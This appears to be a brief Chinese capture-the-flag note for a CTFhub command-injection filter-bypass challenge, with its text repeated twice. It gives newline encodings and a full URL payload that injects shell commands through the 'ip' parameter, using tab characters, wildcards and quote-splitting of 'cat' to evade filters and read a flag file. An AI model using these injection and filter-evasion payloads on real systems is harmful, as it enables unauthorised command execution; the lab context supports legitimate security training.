CTFhub-RCE-综合过滤练习
%0a
、%0d
、%0D%0A
burp 抓包
修改请求为 POST /?127.0.0.1%0als 列出当前目录
返回包
http://challenge-135e46015a30567b.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0acd%09*here%0ac%27a%27t%09*
_311632412323588.php
%0a
、%0d
、%0D%0A
burp 抓包
修改请求为 POST /?127.0.0.1%0als 列出当前目录
返回包
http://challenge-135e46015a30567b.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0acd%09*here%0ac%27a%27t%09*
_311632412323588.php